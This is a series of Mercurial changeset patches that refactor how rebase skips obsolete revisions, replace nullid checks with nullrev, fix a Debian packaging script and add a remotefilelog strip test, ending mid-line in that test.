--- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -368,6 +368,8 @@ self.resume = True try: self.restorestatus() + # Calculate self.obsoletenotrebased + self._handleskippingobsolete() self.collapsemsg = restorecollapsemsg(self.repo, isabort) except error.RepoLookupError: if isabort: @@ -434,6 +436,9 @@ self.prepared = True + # Calculate self.obsoletenotrebased + self._handleskippingobsolete() + def _assignworkingcopy(self): if self.inmemory: from mercurial.context import overlayworkingctx @@ -467,9 +472,6 @@ _(b'cannot collapse multiple named branches') ) - # Calculate self.obsoletenotrebased - self._handleskippingobsolete() - # Keep track of the active bookmarks in order to reset them later self.activebookmark = self.activebookmark or repo._activebookmark if self.activebookmark: # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616175256 25200 # Fri Mar 19 10:34:16 2021 -0700 # Node ID 47c251a145255b30061971a4c241567b78e83158 # Parent d95edcbe5c99e8f489022f7627f27304c06c90b3 rebase: clarify names of variables and function related to obsolete revisions Differential Revision: https://phab.mercurial-scm.org/D10248 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -205,8 +205,8 @@ self.skipemptysuccessorf = rewriteutil.skip_empty_successor( repo.ui, b'rebase' ) - self.obsoletenotrebased = {} - self.obsoletewithoutsuccessorindestination = set() + self.obsolete_with_successor_in_destination = {} + self.obsolete_with_successor_in_rebase_set = set() self.inmemory = inmemory self.dryrun = dryrun self.stateobj = statemod.cmdstate(repo, b'rebasestate') @@ -350,16 +350,16 @@ def _handleskippingobsolete(self): """Compute structures necessary for skipping obsolete revisions""" - self.obsoletenotrebased = {} + self.obsolete_with_successor_in_destination = {} if not self.ui.configbool(b'experimental', b'rebaseskipobsolete'): return obsoleteset = {r for r in self.state if self.repo[r].obsolete()} ( - self.obsoletenotrebased, - self.obsoletewithoutsuccessorindestination, - ) = _computeobsoletenotrebased(self.repo, obsoleteset, self.destmap) - skippedset = set(self.obsoletenotrebased) - skippedset.update(self.obsoletewithoutsuccessorindestination) + self.obsolete_with_successor_in_destination, + self.obsolete_with_successor_in_rebase_set, + ) = _compute_obsolete_sets(self.repo, obsoleteset, self.destmap) + skippedset = set(self.obsolete_with_successor_in_destination) + skippedset.update(self.obsolete_with_successor_in_rebase_set) _checkobsrebase(self.repo, self.ui, obsoleteset, skippedset) def _prepareabortorcontinue( @@ -368,7 +368,7 @@ self.resume = True try: self.restorestatus() - # Calculate self.obsoletenotrebased + # Calculate self.obsolete_* sets self._handleskippingobsolete() self.collapsemsg = restorecollapsemsg(self.repo, isabort) except error.RepoLookupError: @@ -436,7 +436,7 @@ self.prepared = True - # Calculate self.obsoletenotrebased + # Calculate self.obsolete_* sets self._handleskippingobsolete() def _assignworkingcopy(self): @@ -501,8 +501,8 @@ if not allowdivergence: sortedrevs -= self.repo.revs( b'descendants(%ld) and not %ld', - self.obsoletewithoutsuccessorindestination, - self.obsoletewithoutsuccessorindestination, + self.obsolete_with_successor_in_rebase_set, + self.obsolete_with_successor_in_rebase_set, ) for rev in sortedrevs: self._rebasenode(tr, rev, allowdivergence, progress) @@ -575,7 +575,7 @@ ui.status(_(b'already rebased %s\n') % desc) elif ( not allowdivergence - and rev in self.obsoletewithoutsuccessorindestination + and rev in self.obsolete_with_successor_in_rebase_set ): msg = ( _( @@ -586,8 +586,8 @@ ) repo.ui.status(msg) self.skipped.add(rev) - elif rev in self.obsoletenotrebased: - succ = self.obsoletenotrebased[rev] + elif rev in self.obsolete_with_successor_in_destination: + succ = self.obsolete_with_successor_in_destination[rev] if succ is None: msg = _(b'note: not rebasing %s, it has no successor\n') % desc else: @@ -613,7 +613,7 @@ self.destmap, self.state, self.skipped, - self.obsoletenotrebased, + self.obsolete_with_successor_in_destination, ) if self.resume and self.wctx.p1().rev() == p1: repo.ui.debug(b'resuming interrupted rebase\n') @@ -725,7 +725,7 @@ self.destmap, self.state, self.skipped, - self.obsoletenotrebased, + self.obsolete_with_successor_in_destination, ) editopt = opts.get(b'edit') editform = b'rebase.collapse' @@ -2179,17 +2179,17 @@ return ret -def _computeobsoletenotrebased(repo, rebaseobsrevs, destmap): - """Return (obsoletenotrebased, obsoletewithoutsuccessorindestination). +def _compute_obsolete_sets(repo, rebaseobsrevs, destmap): + """Figure out what to do about about obsolete revisions - `obsoletenotrebased` is a mapping mapping obsolete => successor for all + `obsolete_with_successor_in_destination` is a mapping mapping obsolete => successor for all obsolete nodes to be rebased given in `rebaseobsrevs`. - `obsoletewithoutsuccessorindestination` is a set with obsolete revisions - without a successor in destination. + `obsolete_with_successor_in_rebase_set` is a set with obsolete revisions, + without a successor in destination, that would cause divergence. """ - obsoletenotrebased = {} - obsoletewithoutsuccessorindestination = set() + obsolete_with_successor_in_destination = {} + obsolete_with_successor_in_rebase_set = set() assert repo.filtername is None cl = repo.changelog @@ -2205,21 +2205,24 @@ succrevs.discard(None) if not successors or succrevs.issubset(extinctrevs): # no successor, or all successors are extinct - obsoletenotrebased[srcrev] = None + obsolete_with_successor_in_destination[srcrev] = None else: dstrev = destmap[srcrev] for succrev in succrevs: if cl.isancestorrev(succrev, dstrev): - obsoletenotrebased[srcrev] = succrev + obsolete_with_successor_in_destination[srcrev] = succrev break else: # If 'srcrev' has a successor in rebase set but none in # destination (which would be catched above), we shall skip it # and its descendants to avoid divergence. if srcrev in extinctrevs or any(s in destmap for s in succrevs): - obsoletewithoutsuccessorindestination.add(srcrev) + obsolete_with_successor_in_rebase_set.add(srcrev) - return obsoletenotrebased, obsoletewithoutsuccessorindestination + return ( + obsolete_with_successor_in_destination, + obsolete_with_successor_in_rebase_set, + ) def abortrebase(ui, repo): # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616219579 25200 # Fri Mar 19 22:52:59 2021 -0700 # Node ID 535de0e34a797f9b188ff5c5d652f96a70d65c2c # Parent 47c251a145255b30061971a4c241567b78e83158 rebase: filter out descendants of divergence-causing commits earlier `hg rebase` treats obsolete commits differently depending what has happened to the commit: 1) Obsolete commit without non-obsolete successors: Skipped, and a note is printed ("it has no successor"). 2) Obsolete commit with a successor in the destination (ancestor of it): Skipped, and a note is printed ("already in destination"). 3) Obsolete commit with a successor in the rebase set: The commit and its descendants are skipped, and a note is printed ("not rebasing <commit> and its descendants as this would cause divergence"), unless `allowdivergence` config set. 4) Obsolete commit with a successor elsewhere: Error ("this rebase will cause divergences"), unless `allowdivergence` config set. Before this patch, we did all those checks up front, except for (3), which was checked later. The later check consisted of two parts: 1) filtering out of descendants, and 2) conditionally printing message if the `allowdivergence` config was not set. This patch makes it so we do the filtering early. A consequence of filtering out divergence-causing commits earlier is that we rebase commits in slightly different order, which has some impact on tests. Differential Revision: https://phab.mercurial-scm.org/D10249 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -361,6 +361,19 @@ skippedset = set(self.obsolete_with_successor_in_destination) skippedset.update(self.obsolete_with_successor_in_rebase_set) _checkobsrebase(self.repo, self.ui, obsoleteset, skippedset) + allowdivergence = self.ui.configbool( + b'experimental', b'evolution.allowdivergence' + ) + if allowdivergence: + self.obsolete_with_successor_in_rebase_set = set() + else: + for rev in self.repo.revs( + b'descendants(%ld) and not %ld', + self.obsolete_with_successor_in_rebase_set, + self.obsolete_with_successor_in_rebase_set, + ): + self.state.pop(rev, None) + self.destmap.pop(rev, None) def _prepareabortorcontinue( self, isabort, backup=True, suppwarns=False, dryrun=False, confirm=False @@ -493,19 +506,10 @@ def progress(ctx): p.increment(item=(b"%d:%s" % (ctx.rev(), ctx))) - allowdivergence = self.ui.configbool( - b'experimental', b'evolution.allowdivergence' - ) for subset in sortsource(self.destmap): sortedrevs = self.repo.revs(b'sort(%ld, -topo)', subset) - if not allowdivergence: - sortedrevs -= self.repo.revs( - b'descendants(%ld) and not %ld', - self.obsolete_with_successor_in_rebase_set, - self.obsolete_with_successor_in_rebase_set, - ) for rev in sortedrevs: - self._rebasenode(tr, rev, allowdivergence, progress) + self._rebasenode(tr, rev, progress) p.complete() ui.note(_(b'rebase merging completed\n')) @@ -567,16 +571,13 @@ return newnode - def _rebasenode(self, tr, rev, allowdivergence, progressfn): + def _rebasenode(self, tr, rev, progressfn): repo, ui, opts = self.repo, self.ui, self.opts ctx = repo[rev] desc = _ctxdesc(ctx) if self.state[rev] == rev: ui.status(_(b'already rebased %s\n') % desc) - elif ( - not allowdivergence - and rev in self.obsolete_with_successor_in_rebase_set - ): + elif rev in self.obsolete_with_successor_in_rebase_set: msg = ( _( b'note: not rebasing %s and its descendants as ' diff --git a/tests/test-rebase-obsolete3.t b/tests/test-rebase-obsolete3.t --- a/tests/test-rebase-obsolete3.t +++ b/tests/test-rebase-obsolete3.t @@ -72,9 +72,9 @@ $ hg rebase -b 'e' -d 'x' rebasing 1:488e1b7e7341 b "b" rebasing 3:a82ac2b38757 c "c" + note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence rebasing 5:027ad6c5830d d' "d'" rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence $ hg log -G -r 'a':: o 11:eb6d63fc4ed5 e | @@ -207,16 +207,16 @@ $ hg rebase -b 'f' -d 'x' rebasing 1:488e1b7e7341 b "b" rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" rebasing 4:76be324c128b d "d" note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence + rebasing 5:63324dc512ea e' "e'" + rebasing 7:3ffec603ab53 f "f" $ hg log -G -r 'a': - o 13:a1707a5b7c2c d + o 13:ef6251596616 f | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' + o 12:b6f172e64af9 e' + | + | o 11:a1707a5b7c2c d |/ o 10:d008e6b4d3fd c | @@ -224,13 +224,13 @@ | | * 8:2876ce66c6eb g | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) + | | x 7:3ffec603ab53 f (rewritten using rebase as 13:ef6251596616) | | | | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) + | | x 5:63324dc512ea e' (rewritten using rebase as 12:b6f172e64af9) | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) + | x | 4:76be324c128b d (rewritten using rebase as 11:a1707a5b7c2c) | |/ | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) | | # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616536171 25200 # Tue Mar 23 14:49:31 2021 -0700 # Node ID c2438f2f635c4b0b486a76fdbfecbfc2c22528b5 # Parent 535de0e34a797f9b188ff5c5d652f96a70d65c2c rebase: set `prepared = True` at very end of `_preparenewrebase()` Once we've set `rebaseruntime.prepared = True`, `rebaseruntime.repo` starts returning the unfiltered repo. That will make my next patch break, because that patch moves the call to `rewriteutil.precheck()` after the call to `_handleskippingobsolete()`, which current happens after `prepared = True`. We therefore need to prepare by moving `prepared = True` a bit later, after `_handleskippingobsolete()`. I don't think that matters for that call. Differential Revision: https://phab.mercurial-scm.org/D10257 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -447,11 +447,11 @@ if dest.closesbranch() and not self.keepbranchesf: self.ui.status(_(b'reopening closed branch head %s\n') % dest) - self.prepared = True - # Calculate self.obsolete_* sets self._handleskippingobsolete() + self.prepared = True + def _assignworkingcopy(self): if self.inmemory: from mercurial.context import overlayworkingctx @@ -2192,7 +2192,6 @@ obsolete_with_successor_in_destination = {} obsolete_with_successor_in_rebase_set = set() - assert repo.filtername is None cl = repo.changelog get_rev = cl.index.get_rev extinctrevs = set(repo.revs(b'extinct()')) # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616534140 25200 # Tue Mar 23 14:15:40 2021 -0700 # Node ID 80cac9936324965f0f7116dddb06ce7470ec2411 # Parent c2438f2f635c4b0b486a76fdbfecbfc2c22528b5 reabase: call rewriteutil.precheck() a bit later We now filter out descendants of divergence-causing commits in `_handleskippingobsolete()`. The filtered-out commits are removed from the rebase set (`destmap` and `state`). We should therefore call `rewriteutil.precheck()` after `_handleskippingobsolete()`. This patch does that. It hasn't mattered so far because `rewriteutil.precheck()` doesn't yet check for divergence, but it will soon. This affects one test where we now fail because the user is trying to rebase an ancestor instead of failing because they tried to rebase a public commit. We have several similar tests just after, where we still fail because of the phase, so that seems fine. The difference in behavior also seems fine to me. Differential Revision: https://phab.mercurial-scm.org/D10258 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -413,15 +413,6 @@ if not destmap: return _nothingtorebase() - rebaseset = destmap.keys() - if not self.keepf: - try: - rewriteutil.precheck(self.repo, rebaseset, action=b'rebase') - except error.Abort as e: - if e.hint is None: - e.hint = _(b'use --keep to keep original changesets') - raise e - result = buildstate(self.repo, destmap, self.collapsef) if not result: @@ -450,6 +441,15 @@ # Calculate self.obsolete_* sets self._handleskippingobsolete() + rebaseset = destmap.keys() + if not self.keepf: + try: + rewriteutil.precheck(self.repo, rebaseset, action=b'rebase') + except error.Abort as e: + if e.hint is None: + e.hint = _(b'use --keep to keep original changesets') + raise e + self.prepared = True def _assignworkingcopy(self): diff --git a/tests/test-rebase-scenario-global.t b/tests/test-rebase-scenario-global.t --- a/tests/test-rebase-scenario-global.t +++ b/tests/test-rebase-scenario-global.t @@ -325,9 +325,8 @@ $ hg pull --config phases.publish=True -q -r 6 . # update phase of 6 $ hg rebase -d 0 -b 6 - abort: cannot rebase public changesets - (see 'hg help phases' for details) - [10] + nothing to rebase + [1] $ hg rebase -d 5 -b 6 abort: cannot rebase public changesets (see 'hg help phases' for details) # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616564907 25200 # Tue Mar 23 22:48:27 2021 -0700 # Node ID 27ba8acd568464e85ffacdb33357d9583bf45cae # Parent 80cac9936324965f0f7116dddb06ce7470ec2411 rebase: don't call rewriteutil.precheck() with to-be-skipped commits It's clearly incorrect to call `rewriteutil.precheck()` for commits that we're not about to rewrite. We haven't noticed yet because the function doesn't check for divergence, but I'm about to teach it to do that. Differential Revision: https://phab.mercurial-scm.org/D10259 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -441,8 +441,10 @@ # Calculate self.obsolete_* sets self._handleskippingobsolete() - rebaseset = destmap.keys() if not self.keepf: + rebaseset = set(destmap.keys()) + rebaseset -= set(self.obsolete_with_successor_in_destination) + rebaseset -= self.obsolete_with_successor_in_rebase_set try: rewriteutil.precheck(self.repo, rebaseset, action=b'rebase') except error.Abort as e: # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1613107385 28800 # Thu Feb 11 21:23:05 2021 -0800 # Node ID d083c12032c652d71536c86bbcf4e9e9ec13f5ed # Parent 27ba8acd568464e85ffacdb33357d9583bf45cae tests: update divergence test for `hg fix` to actually result in divergence We have a test that checks that `hg fix` errors out if it might cause divergence. However, the test simply prunes the commit it then tries to fix, so fixing it wouldn't actually cause divergence. That works because the implementation is simple enough that it doesn't notice the difference. I'm about to make the implementation smarter, so let's fix the test first. Differential Revision: https://phab.mercurial-scm.org/D10267 diff --git a/tests/test-fix.t b/tests/test-fix.t --- a/tests/test-fix.t +++ b/tests/test-fix.t @@ -1106,14 +1106,13 @@ $ printf "foo\n" > foo.changed $ hg commit -Aqm "foo" - $ hg debugobsolete `hg parents --template '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets + $ hg ci --amend -m rewritten $ hg --hidden fix -r 0 abort: fixing obsolete revision could cause divergence [255] $ hg --hidden fix -r 0 --config experimental.evolution.allowdivergence=true + 2 new content-divergent changesets $ hg cat -r tip foo.changed FOO # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1616961219 -7200 # Sun Mar 28 21:53:39 2021 +0200 # Node ID eb2a6f66c463b5a3081cf8802ebd7d6888feb54a # Parent d083c12032c652d71536c86bbcf4e9e9ec13f5ed fix: merge imports Differential Revision: https://phab.mercurial-scm.org/D10277 diff --git a/hgext/fix.py b/hgext/fix.py --- a/hgext/fix.py +++ b/hgext/fix.py @@ -131,8 +131,10 @@ import subprocess from mercurial.i18n import _ -from mercurial.node import nullrev -from mercurial.node import wdirrev +from mercurial.node import ( + nullrev, + wdirrev, +) from mercurial.utils import procutil # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616953837 -7200 # Sun Mar 28 19:50:37 2021 +0200 # Node ID 6dea77e195d2060ed7fd1839c7dec979782a0b3d # Parent eb2a6f66c463b5a3081cf8802ebd7d6888feb54a test: enforce master to be the default branch in test Newer git issue a message about this. Differential Revision: https://phab.mercurial-scm.org/D10281 diff --git a/tests/test-git-interop.t b/tests/test-git-interop.t --- a/tests/test-git-interop.t +++ b/tests/test-git-interop.t @@ -14,6 +14,7 @@ > git commit "$@" >/dev/null 2>/dev/null || echo "git commit error" > count=`expr $count + 1` > } + $ git config --global init.defaultBranch master $ hg version -v --config extensions.git= | grep '^[E ]' # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1616974554 -7200 # Mon Mar 29 01:35:54 2021 +0200 # Node ID e7b4607d52e3cc850355b84a66f111766eb32ac1 # Parent 6dea77e195d2060ed7fd1839c7dec979782a0b3d setdiscovery: simplify by using tiprev directly tip() uses tiprev() and reads the node from it, so drop a layer of indirection. Differential Revision: https://phab.mercurial-scm.org/D10289 diff --git a/mercurial/setdiscovery.py b/mercurial/setdiscovery.py --- a/mercurial/setdiscovery.py +++ b/mercurial/setdiscovery.py @@ -390,7 +390,7 @@ if audit is not None: audit[b'total-roundtrips'] = 1 - if cl.tip() == nullid: + if cl.tiprev() == nullrev: if srvheadhashes != [nullid]: return [nullid], True, srvheadhashes return [nullid], False, [] # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1617064392 -7200 # Tue Mar 30 02:33:12 2021 +0200 # Node ID ad878e3f282b2623840e66226b29d9fbebd3cfbc # Parent e7b4607d52e3cc850355b84a66f111766eb32ac1 refactor: prefer lookup by revision, even for null While the nullid lookup is a special case, it is still more complicated. The common pattern is to lookup via nullrev so be consistent here. Differential Revision: https://phab.mercurial-scm.org/D10280 diff --git a/mercurial/cmdutil.py b/mercurial/cmdutil.py --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -16,6 +16,7 @@ from .node import ( hex, nullid, + nullrev, short, ) from .pycompat import ( @@ -1936,12 +1937,12 @@ ui.debug(b'message:\n%s\n' % (message or b'')) if len(parents) == 1: - parents.append(repo[nullid]) + parents.append(repo[nullrev]) if opts.get(b'exact'): if not nodeid or not p1: raise error.InputError(_(b'not a Mercurial patch')) p1 = repo[p1] - p2 = repo[p2 or nullid] + p2 = repo[p2 or nullrev] elif p2: try: p1 = repo[p1] @@ -1951,10 +1952,10 @@ # first parent. if p1 != parents[0]: p1 = parents[0] - p2 = repo[nullid] + p2 = repo[nullrev] except error.RepoError: p1, p2 = parents - if p2.node() == nullid: + if p2.rev() == nullrev: ui.warn( _( b"warning: import the patch as a normal revision\n" diff --git a/mercurial/context.py b/mercurial/context.py --- a/mercurial/context.py +++ b/mercurial/context.py @@ -3000,7 +3000,7 @@ parents = [repo[p] for p in parents if p is not None] parents = parents[:] while len(parents) < 2: - parents.append(repo[nullid]) + parents.append(repo[nullrev]) p1, p2 = self._parents = parents # sanity check to ensure that the reused manifest parents are # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1617064350 -7200 # Tue Mar 30 02:32:30 2021 +0200 # Node ID 728d89f6f9b1d180749d7678342c2a0eb8a72f42 # Parent ad878e3f282b2623840e66226b29d9fbebd3cfbc refactor: prefer checks against nullrev over nullid A common pattern is using a changeset context and obtaining the node to compare against nullid. Change this to obtain the nullrev instead. In the future, the nullid becomes a property of the repository and is no longer a global constant, so using nullrev is much easier to reason about. Python function call overhead makes the difference moot, but future changes will result in more dictionary lookups otherwise, so prefer the simpler pattern. Differential Revision: https://phab.mercurial-scm.org/D10290 diff --git a/hgext/extdiff.py b/hgext/extdiff.py --- a/hgext/extdiff.py +++ b/hgext/extdiff.py @@ -91,7 +91,7 @@ from mercurial.i18n import _ from mercurial.node import ( - nullid, + nullrev, short, ) from mercurial import ( @@ -565,18 +565,18 @@ repo, [from_rev] + [to_rev], b'nowarn' ) ctx1a = scmutil.revsingle(repo, from_rev, None) - ctx1b = repo[nullid] + ctx1b = repo[nullrev] ctx2 = scmutil.revsingle(repo, to_rev, None) else: ctx1a, ctx2 = scmutil.revpair(repo, revs) if not revs: ctx1b = repo[None].p2() else: - ctx1b = repo[nullid] + ctx1b = repo[nullrev] # Disable 3-way merge if there is only one parent if do3way: - if ctx1b.node() == nullid: + if ctx1b.rev() == nullrev: do3way = False matcher = scmutil.match(ctx2, pats, opts) diff --git a/hgext/split.py b/hgext/split.py --- a/hgext/split.py +++ b/hgext/split.py @@ -12,7 +12,7 @@ from mercurial.i18n import _ from mercurial.node import ( - nullid, + nullrev, short, ) @@ -80,12 +80,12 @@ raise error.InputError(_(b'cannot split multiple revisions')) rev = revs.first() - ctx = repo[rev] - # Handle nullid specially here (instead of leaving for precheck() + # Handle nullrev specially here (instead of leaving for precheck() # below) so we get a nicer message and error code. - if rev is None or ctx.node() == nullid: + if rev is None or rev == nullrev: ui.status(_(b'nothing to split\n')) return 1 + ctx = repo[rev] if ctx.node() is None: raise error.InputError(_(b'cannot split working directory')) diff --git a/mercurial/context.py b/mercurial/context.py --- a/mercurial/context.py +++ b/mercurial/context.py @@ -2885,7 +2885,7 @@ # "1 < len(self._parents)" can't be used for checking # existence of the 2nd parent, because "memctx._parents" is # explicitly initialized by the list, of which length is 2. - if p2.node() != nullid: + if p2.rev() != nullrev: man2 = p2.manifest() managing = lambda f: f in man1 or f in man2 else: @@ -2903,7 +2903,7 @@ return scmutil.status(modified, added, removed, [], [], [], []) def parents(self): - if self._parents[1].node() == nullid: + if self._parents[1].rev() == nullrev: return [self._parents[0]] return self._parents @@ -3052,7 +3052,7 @@ # "1 < len(self._parents)" can't be used for checking # existence of the 2nd parent, because "metadataonlyctx._parents" is # explicitly initialized by the list, of which length is 2. - if p2.node() != nullid: + if p2.rev() != nullrev: man2 = p2.manifest() managing = lambda f: f in man1 or f in man2 else: diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -149,7 +149,7 @@ # optimization, since the ctx.files() for a merge commit is not correct for # this comparison. forwardmissingmatch = match - if b.p1() == a and b.p2().node() == nullid: + if b.p1() == a and b.p2().rev() == nullrev: filesmatcher = matchmod.exact(b.files()) forwardmissingmatch = matchmod.intersectmatchers(match, filesmatcher) if repo.ui.configbool(b'devel', b'copy-tracing.trace-all-files'): diff --git a/mercurial/logcmdutil.py b/mercurial/logcmdutil.py --- a/mercurial/logcmdutil.py +++ b/mercurial/logcmdutil.py @@ -14,6 +14,7 @@ from .i18n import _ from .node import ( nullid, + nullrev, wdirid, wdirrev, ) @@ -82,7 +83,7 @@ If diff.merge is enabled, an overlayworkingctx of the auto-merged parents will be returned. """ repo = ctx.repo() - if repo.ui.configbool(b"diff", b"merge") and ctx.p2().node() != nullid: + if repo.ui.configbool(b"diff", b"merge") and ctx.p2().rev() != nullrev: # avoid cycle context -> subrepo -> cmdutil -> logcmdutil from . import context diff --git a/mercurial/mergestate.py b/mercurial/mergestate.py --- a/mercurial/mergestate.py +++ b/mercurial/mergestate.py @@ -11,6 +11,7 @@ hex, nullhex, nullid, + nullrev, ) from . import ( error, @@ -341,7 +342,7 @@ flo = fco.flags() fla = fca.flags() if b'x' in flags + flo + fla and b'l' not in flags + flo + fla: - if fca.node() == nullid and flags != flo: + if fca.rev() == nullrev and flags != flo: if preresolve: self._repo.ui.warn( _( diff --git a/mercurial/shelve.py b/mercurial/shelve.py --- a/mercurial/shelve.py +++ b/mercurial/shelve.py @@ -534,7 +534,7 @@ parent = parents[0] origbranch = wctx.branch() - if parent.node() != nullid: + if parent.rev() != nullrev: desc = b"changes to: %s" % parent.description().split(b'\n', 1)[0] else: desc = b'(changes in empty repository)' diff --git a/mercurial/simplemerge.py b/mercurial/simplemerge.py --- a/mercurial/simplemerge.py +++ b/mercurial/simplemerge.py @@ -19,7 +19,7 @@ from __future__ import absolute_import from .i18n import _ -from .node import nullid +from .node import nullrev from . import ( error, mdiff, @@ -427,7 +427,7 @@ def is_not_null(ctx): if not util.safehasattr(ctx, "node"): return False - return ctx.node() != nullid + return ctx.rev() != nullrev def _mergediff(m3, name_a, name_b, name_base): # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1617144876 25200 # Tue Mar 30 15:54:36 2021 -0700 # Node ID 2fd5e0054dd9d2e36ba0b796726c701d9538294f # Parent 728d89f6f9b1d180749d7678342c2a0eb8a72f42 deb: avoid use of [[ in 'rules' file It's not supported by posix shell, and apparently my build system uses that. Differential Revision: https://phab.mercurial-scm.org/D10292 diff --git a/contrib/packaging/debian/rules b/contrib/packaging/debian/rules --- a/contrib/packaging/debian/rules +++ b/contrib/packaging/debian/rules @@ -96,7 +96,7 @@ cp contrib/bash_completion "$(CURDIR)"/debian/mercurial/usr/share/bash-completion/completions/hg mkdir -p "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions cp contrib/zsh_completion "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions/_hg - if [[ "$(DEB_HG_CHG_BY_DEFAULT)" -eq 1 ]]; then \ + if [ "$(DEB_HG_CHG_BY_DEFAULT)" -eq 1 ]; then \ mkdir -p "$(CURDIR)"/debian/mercurial/usr/lib/mercurial; \ mv "$(CURDIR)"/debian/mercurial/usr/bin/hg "$(CURDIR)"/debian/mercurial/usr/lib/mercurial/hg; \ ln -s chg "$(CURDIR)"/debian/mercurial/usr/bin/hg; \ # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1617142792 -7200 # Wed Mar 31 00:19:52 2021 +0200 # Node ID 94ea945190f300fb0e27ad1aa97ca4b7d3081630 # Parent 2fd5e0054dd9d2e36ba0b796726c701d9538294f mergestate: remove unused import Differential Revision: https://phab.mercurial-scm.org/D10291 diff --git a/mercurial/mergestate.py b/mercurial/mergestate.py --- a/mercurial/mergestate.py +++ b/mercurial/mergestate.py @@ -10,7 +10,6 @@ bin, hex, nullhex, - nullid, nullrev, ) from . import ( # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1617748713 25200 # Tue Apr 06 15:38:33 2021 -0700 # Node ID 2819df466cae70b26c0501f765aff1edfa8a90be # Parent 94ea945190f300fb0e27ad1aa97ca4b7d3081630 tests: add test-remotefilelog-strip.t to demonstrate an issue with linknodes ### Background Every time a commit is modified, remotefilelog updates the metadata for the file object to point to the new commit (I believe that this is different from non-remotefilelog hg, which leaves the linkrevs pointing to the obsolete commits; doing otherwise would involve changing data in the middle of revlogs). With `hg strip` (or other things that use repair.strip()), when you strip a commit that's not the tip of the revlog, there may be commits after it in revnum order that aren't descended from it and don't need to be (and shouldn't be) stripped. These are "saved" by strip in a bundle, and that bundle is reapplied after truncating the relevant revlogs. ### The problem Remotefilelog generally avoids being involved at all in strip. Currently, that includes even providing file contents to this backup bundle. This can cause the linknode to point to a changeset that is no longer in the repository. Example: ``` @ 3 df91f74b871e | | x 2 70494d7ec5ef |/ | x 1 1e423846dde0 |/ o 0 b292c1e3311f ``` Commits 1, 2, and 3 are related via obsolescence, and are description-only changes. The linknode for the file in these commits changed each time we updated the description, so it's currently df91f7. If I strip commits 1 and 3, however, the linknode *remains* df91f7, which no longer exists in the repository. Commit 70494d was "saved", stripped, and then reapplied, so it is in the repository (as revision 1 instead of 2 now), and was unobsoleted since the obsmarker was stripped as well. The linknode for the file should point to 70494d, the most recent commit that is in the repository that modified the file. Remotefilelog has some logic to handle broken linknodes, but it can be slow. We have actually disabled it internally because it's too slow for our purposes. Differential Revision: https://phab.mercurial-scm.org/D10319 diff --git a/tests/test-remotefilelog-strip.t b/tests/test-remotefilelog-strip.t new file mode 100644 --- /dev/null +++ b/tests/test-remotefilelog-strip.t @@ -0,0 +1,67 @@ +#require no-windows + + $ . "$TESTDIR/remotefilelog-library.sh" + + $ hg init master + $ cd master + $ cat >> .hg/hgrc <<EOF + > [remotefilelog] + > server=True + > EOF + $ echo x > x + $ hg commit -qAm x + + $ cd .. + + $ hgcloneshallow ssh://user@dummy/master shallow -q + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) + $ cd shallow + + $ cat >> $TESTTMP/get_file_linknode.py <<EOF + > from mercurial import node, registrar, scmutil + > cmdtable = {} + > command = registrar.command(cmdtable) + > @command(b'debug-file-linknode', [(b'r', b'rev', b'.', b'rev')], b'hg debug-file-linknode FILE') + > def debug_file_linknode(ui, repo, file, **opts): + > rflctx = scmutil.revsingle(repo.unfiltered(), opts['rev']).filectx(file) + > ui.status(b'%s\n' % node.hex(rflctx.ancestormap()[rflctx._filenode][2])) + > EOF + + $ cat >> .hg/hgrc <<EOF + > [ui] + > interactive=1 + > [extensions] + > strip= + > get_file_linknode=$TESTTMP/get_file_linknode.py + > [experimental] + > evolution=createmarkers,allowunstable + > EOF + $ echo a > a + $ hg commit -qAm msg1 + $ hg commit --amend 're:^$' -m msg2 + $ hg commit --amend 're:^$' -m msg3 + $ hg --hidden log -G -T '{rev} {node|short}' + @ 3 df91f74b871e + | + | x 2 70494d7ec5ef + |/ + | x 1 1e423846dde0 + |/ + o 0 b292c1e3311f + + $ hg debug-file-linknode -r 